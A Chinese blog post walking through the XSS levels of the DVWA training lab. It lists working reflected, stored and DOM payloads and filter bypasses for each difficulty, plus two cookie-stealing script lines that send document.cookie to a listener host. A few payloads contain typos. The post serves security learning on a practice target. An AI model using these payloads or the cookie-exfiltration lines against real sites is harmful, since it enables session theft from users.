XSS注入实例-DVWA

已于 2024-01-23 10:38:55 修改
阅读量343 收藏 10
点赞数 9
分类专栏: # XSS漏洞 文章标签: xss javascript 前端 安全
于 2024-01-19 12:56:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62715196/article/details/135678650
版权
DVWA
反射型
低级别
<script>alert(document.cookie)</script>

在这里插入图片描述

中级别

安全配置对

<SCRIPT>alter(document.cookie)</script> 大写也不管用

<sc<script>ript>alert(document.cookie)</script>

在这里插入图片描述

高级别

安全配置对

<img src=l onerror=alert(document.cookie)>

在这里插入图片描述

存储型
低级别
<script>alert(document.cookie)</script>

在这里插入图片描述

<script>document.location="http://192.168.65.130/xss.php?cookie="+document.cookie</script>
用户访问后,靶机上获取到 cookie,靶机访问页面时更改 cookie

在这里插入图片描述

中级别

安全配置使用了终极大招,但 name 框只做了简单限制

在name框输入
<SCRIPT>alert(document.cookie)</script>

<sc<script>ript>alert(document.cookie)</script>

<script>newlmage().src="http://192.168.65.130/xss.php?cookie="+document.cookie</script>

在这里插入图片描述
在这里插入图片描述

高级别

安全配置使用了终极大招,name 框做了逐字检查

在 name 框输入
<img src=l onerror=alert(document.cookie)>

在这里插入图片描述

DOM 型

通过 document 把用户输入的值带入 value,最后显示给用户

低级别

安全配置没有做限制

<script>alert(document.cookie)</script>

在这里插入图片描述
在这里插入图片描述

中级别

安全配置对提交的值做检查,如果有<script 就跳转到 English

></option></select><img src=l onerror=alert(document.cookie)>

在这里插入图片描述

高级别

安全配置是以白名单的形式对用户输入做过滤

#<script>alert(document.cookie)</script>

#%3Cscript%3Ealert(document.cookie)%3C/script%3E

在这里插入图片描述

通关

不可能级别

后端没有做安全配置,基于前端的安全机制防御
前端没有对用户输入的参数进行解码操作

摆烂鱼
关注
  • 9
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Input XSS最新漏洞及利用
06-12
我们知道,如果要使XSS能够实现,我们的代码必须通过某种方式嵌入到对方的网页中。像注入漏洞的“’”、“and 1=1”和“and 1=2”一样,Input XSS也有自己的漏洞检测字符串,它们就是“<>”、“<iframe>”和 “<script>alert(/xss/)</script>”。如果当你在Input框中输入“<>”,并在新 页面的源代码中找到这对标签的话,那么基本上就说明它存在Input XSS漏洞;而“<iframe>”则是它的可视化检测方式;如果“<script>alert(/xss/)< /script>”能够实现,则证明该页面可以实行脚本攻击,但是否可以被插入脚本,在本次的测试里亦不是非常重要,后面你将会知道。
XSS注入实例-XSS-Labs
weixin_62715196的博客
01-19 413
通关XSS-Labs靶场前13关,后面七关因为靶场的原因无法打开,待完善以后继续打靶,由于时间有限,所以只是将打靶的过程写出来,具体的原理等后续有时间就继续完善
Bug 记录
xrdshx的博客
09-15 508
Bug记录 CocosCreator打包出现 Error:Program type already present: android.support.v4.os.ResultReceiver$MyResultReceiver 解决方法: 在\build\jsb-link\frameworks\runtime-src\proj.android-studio\gradle.properties中加入下面两行 android.useAndroidX=true android.enableJetifier=true
xss输入前对输入内容进行处理和跨域浏览器设置
weixin_57246351的博客
09-26 373
el-input中对输入进行过滤内容
Ace_with_Yu的博客
06-28 5869
在项目中有时候要对用户的输入内容进行过滤,而不是做校验。 <el-input v-model="input" @input="e => input = inputMe(e)" placeholder="请输入内容"> </el-input> 使用@input对用户输入进行监控 inputMe(e){ return e.replace(/\/...
xss-dvwa靶场详情
04-06
dvwa靶场中的xss漏洞详情
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
经典的xss注入通关游戏,搭建简单。适合网络安全测试人员
xss-labs-master.rar
05-09
xss-labs-master靶机资源,有关于xss漏洞攻击专项练习,一共有二十关,也是小白的看门砖吧!
xss-filter-spring-boot-starter:springboot自动xss
05-17
xss-filter-spring-boot-starter springboot自动xss 使用方法在项目的pom.xml中加入依赖即口 <groupId>com.djk</groupId> <artifactId>xss-filter-spring-boot-starter <version>0.0.1 目前支持3种入参数xss...
2020-12-06-DVWA之sql.md
01-24
dvwa之sql
怎么使用input执行xss攻击_萌新向 | 输入框因何频受攻击?
weixin_32401075的博客
01-08 2960
萌新向XSS漏洞导言:我们决定特别建立一个专辑,以帮助没有基础的人快速入门。该专辑与同样分为Web与二进制两项,但与公众号的专辑区别在于,我们将着重引导新生入门,讲述最简单、最基础的知识,事无巨细地讲述相关知识点与操作,即使你对计算机一无所知,我们也相信,你能跟随着我们的文章,满足你之前对于安全的一些想象。如果你对安全一无所知却又非常感兴趣,那么,我们的文章将会是你入门的最佳选择。我们的...
element-ui带输入建议的input框踩坑(输入建议空白以及会闪出上一次的输入建议问题)
热门推荐
wyhstars的博客
08-14 4万+
前段时间,在实现带输入建议并且支持模糊查询输入框的时候,发现了两个值得注意的小地方。整理出来,以供借鉴。 废话不多说,直接来解决问题。 踩坑问题描述: 问题一: 获取到后端返回的数组,并将数组传入作为 results 传入 callback 后,焦点放在 输入框 上的时候,并未出现任何内容,只出现了一个不完整的空白框。 问题解决方案: 这个问题开始我以为是传进 ...
通过修改EL表达式输出行为解决XSS问题
0x7c00
08-20 5667
项目中有好多通过EL表达式输出字符时没有考虑XSS问题,比如<div> <span>${user.name}</span> </div>简单来说,可以使用jstl标签来显示就好了:<div> <span><c:out value="${user.name}"/></span> </div>问题是,系统中非常多地方都存在这种问题,要一一修改工作量简直就是灾难啊。 我想到的办法是,改变EL表达式的输出
跨站脚本漏洞
weixin_46729085的博客
09-08 3738
XSS漏洞 一、文章简介 XSS漏洞是Web应用程序中最常见的漏洞之一。如果您的站点没有预防XSS漏洞的固定方法,那么很可能就存在XSS漏洞。 这篇文章将带你通过代码层面去理解三个问题: 什么是XSS漏洞? XSS漏洞有哪些分类? 如何防范XSS漏洞? 二:三大分类 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。 存储型XSS:&...
web登录页面代码_XSS实战之登录钓鱼网站后台
weixin_39974882的博客
12-10 2511
前言感觉最近被盗号的很多,好朋友账号被盗,我竟然傻乎乎的转了200大洋。本篇就以钓鱼为主题,只是让大家提升一下对盗号的认识和理解,让大家对于钓鱼盗号有所防范。XSS漏洞之前写过一篇文章讲解XSS漏洞分类以及危害,XSS是跨站脚本攻击,属于被动式的攻击。XSS指的是恶意攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中Web里面的恶意代码会被执行,从而达到特殊目的。最常见的就是...
怎么使用input执行xss攻击_XSS场景及修复方案总结
weixin_32562973的博客
01-16 4585
xss原理跨站脚本攻击(Cross Site Scripting),缩写为XSS。恶意攻击者往Web页面里插入恶意javaScript代码,当用户浏览该页之时,嵌入其中Web里面的javaScript代码会被执行,从而达到恶意攻击用户的目的。xss分类反射型存储型DOM型xss场景和防御1. 恶意数据出现在标签内<body> ...恶意数据 </body>漏洞代码Strin...
【SRC实战】文件名回显导致反射型XSS,URL重定向
最新发布
qq_45196785的博客
05-15 272
2、修改文件名为meta标签,延迟1秒,自动重定向到第三方网站。1、反射型XSS获取用户cookie或者执行恶意JS操作。1、灯塔扫到敏感文件,发现1.txt会在页面回显文件名。“ 以下漏洞均为实验靶场,如有雷同,纯属巧合 ”3、修改文件名为script标签,触发XSS漏洞。2、URL重定向到仿冒网站导致用户账户被盗。“ 文件名回显,能否触发URL重定向?“ 文件名回显,能否触发XSS?2、修改文件名为del标签。3、重定向到第三方网站。
XSS实战漏洞挖掘
hmysn的博客
05-11 628
接下来一年时间将会主要研究渗透测试方向的众多问题,文章中的内容也会在后面定期更新。本文主要记录了一些XSS漏洞挖掘中的实用心得和学习笔记。
xss-labs-master靶场
09-29
xss-labs-master靶场是一个用于学习和实践跨站脚本攻击(Cross-Site Scripting,简称XSS)的实验环境。可以从GitHub上下载该靶场的源码,地址是https://github.com/do0dl3/xss-labs。在这个靶场中,你可以找到各种关于XSS实例和挑战,通过实践来提高对XSS攻击的理解和防御能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值